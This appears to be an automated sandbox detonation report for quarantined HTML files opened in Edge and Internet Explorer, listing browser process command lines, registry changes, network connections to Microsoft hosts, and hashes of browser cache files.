"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa207d46f8,0x7ffa207d4708,0x7ffa207d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3152 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e27df0383d108b2d6cd975d1b42b1afe |
| SHA1 | c216daa71094da3ffa15c787c41b0bc7b32ed40b |
| SHA256 | 812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855 |
| SHA512 | 471935e26a55d26449e48d4c38933ab8c369a92d8f24fd6077131247e8d116d95aa110dd424fa6095176a6c763a6271e978766e74d8022e9cdcc11e6355408ab |
\??\pipe\LOCAL\crashpad_4900_PLXGAIZHPHGMWKTO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 395082c6d7ec10a326236e60b79602f2 |
| SHA1 | 203db9756fc9f65a0181ac49bca7f0e7e4edfb5b |
| SHA256 | b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25 |
| SHA512 | 7095c260b87a0e31ddfc5ddf5730848433dcede2672ca71091efb8c6b1b0fc3333d0540c3ce41087702c99bca22a4548f12692234188e6f457c2f75ab12316bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e40e2eadebab544b915596628efe888b |
| SHA1 | a7db7d4a90b80f02be8d353415b58aca7a1c5221 |
| SHA256 | cd11b8b73e32b6896183a4cf223b671c3179ded9f57f9795eb3e8b2f9f5c172a |
| SHA512 | b82aede96681b83065a446751456590acbe4b2b733268eb3e71f3a2e9a8f6c8fa5ce86f6971a5eaa0b2912b402afadf089c80bc2dbaf95ead0a22369847545ee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 40dfe99596e274ae3c5f3a457ad73b7d |
| SHA1 | b25bfc5b652795beb2fb599d7d81abbd127fe945 |
| SHA256 | fa499d641858f01b8af704a5d73dbf44fd5d8feae394c21c1dd3c8371f513fbf |
| SHA512 | b5f35b6e0f6e23ff816eb688f7c43d408b22855d13e07f7b00bb96e1ee6512f9f04e95b22e84a701b99a047bb029d943130ef3f2d52a6cc907c3d6d66fd6c408 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 75dfa57b5f19cfc04296aa7fe1484e21 |
| SHA1 | 247e80dafb66528a97dce14a21c9ae65af83f7ce |
| SHA256 | 14d67673bd864b63aeaa194092e5de9003e317bcd104f9f3ff42b125b648dbf5 |
| SHA512 | 0d800c87dff7ff9161fd84cb7aab039812d33684abb5348f6077aadafaf11055678523b28a28a034e57ea7810f0cc483b26768979013c41da1872dae67efdd50 |
Analysis: behavioral11
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
119s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774330" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{469EE9C1-F499-11EF-8BDE-523A95B0E536} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000041fa429953179746bab86700d9d5f5e700000000020000000000106600000001000020000000b8d6714cbfb8d6b9a88c55ffa9ca7c1b7ca74c5f5231f6a934d82b324ba40d60000000000e8000000002000020000000254978225f2edd81301a33f99ca0dd1eceedfef660ccb4f7491517dbdb5efe4890000000c2b3b855db65b69f70427602066226ccec2b8a64a901a9c84aaedde9741d7860e7b1ea2057c616545560434307b2bed3152d16ad4dc9db0bf73ba6507e34dfed9d1a1aac6e43312ddae5469f8ab608a391d0e5cfc82d2d8559d092d45f6db6f7407934d37fd82cd2c71de4fb0d28db5e3fd4ae2697b822303677c87088b90d6494f5e4060d61601ffeefe07bbf1a452c40000000d5ae11363709f11f14bbff012f4d2b7ba6414292562aefe2ccaaf976242b471f57a7daaa76fa7e6a756b0ac9c63a0da001724f302a9a3a8302f6fb2aa4c8a395 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000041fa429953179746bab86700d9d5f5e700000000020000000000106600000001000020000000c2899edd856c3d8689e4ae57f42d3dc5662550e57b27b26b98a798c8141944eb000000000e8000000002000020000000ef19e0468a1a1b09c9b956d55be8c939e818bbb2cefe59a246d6b3b678008e4e20000000a7f2582121b18abb051e403301a423a2d9fde7bbc5a803cf1a5d52567f231a43400000003cd48e629cb730e4560360715de8584168c2a5662c046fe13067f0204f43d777bf65e4a3d5af7fb33553c5e97f86282ee5282cc36f435376d658a4aa1a7ca74f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 509f111ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2904 wrote to memory of 2892 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2904 wrote to memory of 2892 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2904 wrote to memory of 2892 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2904 wrote to memory of 2892 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2904 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab82E9.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar837C.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c7e306bb6c9f1e4f2e0d0d7e9510728f |
| SHA1 | 511b07b1e885ff75a3d088fc2b8751f4b9a4ac99 |
| SHA256 | 18c0278df79292091f5f8368dc3a663b24ddc934cc8885d6f23379152788c6b8 |
| SHA512 | f75dd56d1f7c576d191ec7fb04a6491a4b8e24eb220fa704b6b529df32876feb540751e5483f1071d9b42bce5a469200023bf44be3a6dc91f06bf4574e27902a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1b36b97219f054288636ca1139c52bb0 |
| SHA1 | 0ee7839d6a4123fcf0deda3339552fe050fcf8ad |
| SHA256 | 40c0cdccf968364f3b7d80cd5a31de191cc1c978708d33f3687193af3395a80b |
| SHA512 | ee35054e8367876678e29e1994e1dc9552a37c8bb6bc9fee5d4786d3939254da2347ddfffbf13508fb32c4c0fc7c9beacd5e601f50849182c3a0dd811920b641 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 547cf652aaaf41ac6a4c02de63e04c90 |
| SHA1 | 1dba9f35dbc1ef70d3b1b88ff55005dd8e4cdec2 |
| SHA256 | 01ef238f5c7c77d0572e1ba31e537fa5e0db5840254ac77c4e41ca46b658264a |
| SHA512 | 7460cfa08081ffa1e4f034803507073ddedf4806e9501bc8ab6c522b5aa59d84a205abe1b55735b1c74084402da005e4d10e6e43485fa25c34984e70f9b16c23 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 50a46aba9a9601c101929250f1f26109 |
| SHA1 | 0d44f49792e67340000bffe7b224f8cc5210c623 |
| SHA256 | dd948bdaa467ec4f8180f2dc730ca5da9e95587b401908d0623a908b4a39b0ea |
| SHA512 | b476bc1d5b4ed73f51ffd302013f7dbaf0ec2967c0fe7f2fd1b312a44fc735f16c4b163006a8252aba25fe2bb10a358fc6018533495f753b59d69939fbe46258 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 09e8c54ee153292fe22bfb6fc9729b5a |
| SHA1 | 7a924ae6aee4326c0b67c9bd92b70f4d3c9cf7e5 |
| SHA256 | b6527c854f0afbf5a0261b67674ec4b960f2d5dd12f415286c76b0e41c856e34 |
| SHA512 | db61dd50345ba2c49b202146949b76d7fa00315d0c00c9269586da74a4ea001b5d804199fd65e277a2620f2e59725a6d95e0a6253a65cba11587406152b5075e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 64be3f8886e60f3bd9d5afd6250f46ee |
| SHA1 | 387f939d6741050917ac4691c8547e07bb09760c |
| SHA256 | 85ea286614dc34741866afba5ebcdb05e88b197ed8ef14841c3329b0c969a4b9 |
| SHA512 | 5e1191d921a12ab4054c3af5c34be3017d35241d8a24cad9d09cdc7ce20c567c64e75f5f302784c69c81db371c43b4fc4bcf5e8e3569cbe28c431365d07aeda0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ced1a7ff91fdc469e435ac9cae00c049 |
| SHA1 | 538ea866922149248a0e5082efa65b33bb05fc95 |
| SHA256 | 08173bd43c2133862e668734f255f1f0a2bde2faeb13b6b01acd61051d3ea8aa |
| SHA512 | 44042203c9de3e10c0b1f30c7f85ed5cf8bf9ac52150e8618543016024680f3cd44938c9e97427290dad4af383c34b82393bdb08e2d1b8dda011ef5ee190d7f1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9c77253b1bc859c0100fb615ed0c8aab |
| SHA1 | cfd1108138c35a2f1953cf206c548e27be21d6da |
| SHA256 | dd68812d5fafb404bed83dbf80061501554138faa47adea5ecac95c51d0c86d4 |
| SHA512 | 15bd3a2c67aa09c9fe92c92c0bacbe57cd517189132300d5ed8e25411dfca6917c23b0399f05e3ca6a1a4471ab66a51bfa6472d44ba909d32971b3abf78c9fd9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e739f08ae230fe6d3b00972004a7eba2 |
| SHA1 | 60faa1653364ff02c5111ff324582afbe2222de9 |
| SHA256 | 801f81780b91646459ca8e4bd9f9338c702b7a18a6fdb5ebcf20a3a286ff1068 |
| SHA512 | b506104a9357a1242bd66e36229577be46311ecaa78e0354812f396361fb42027ed78523a314273e4b994adc0f1a0b53207898ab9cbb713c826bca47fbb465a8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | adc49f3c3379538709f96849eeaefee6 |
| SHA1 | 92baf2c6a34d21a6b018e76795627501b1c82747 |
| SHA256 | eb3abb1f2c17a730e40c79d0990e7c2d6d0ebb3fe189ce3a1881185e5742473f |
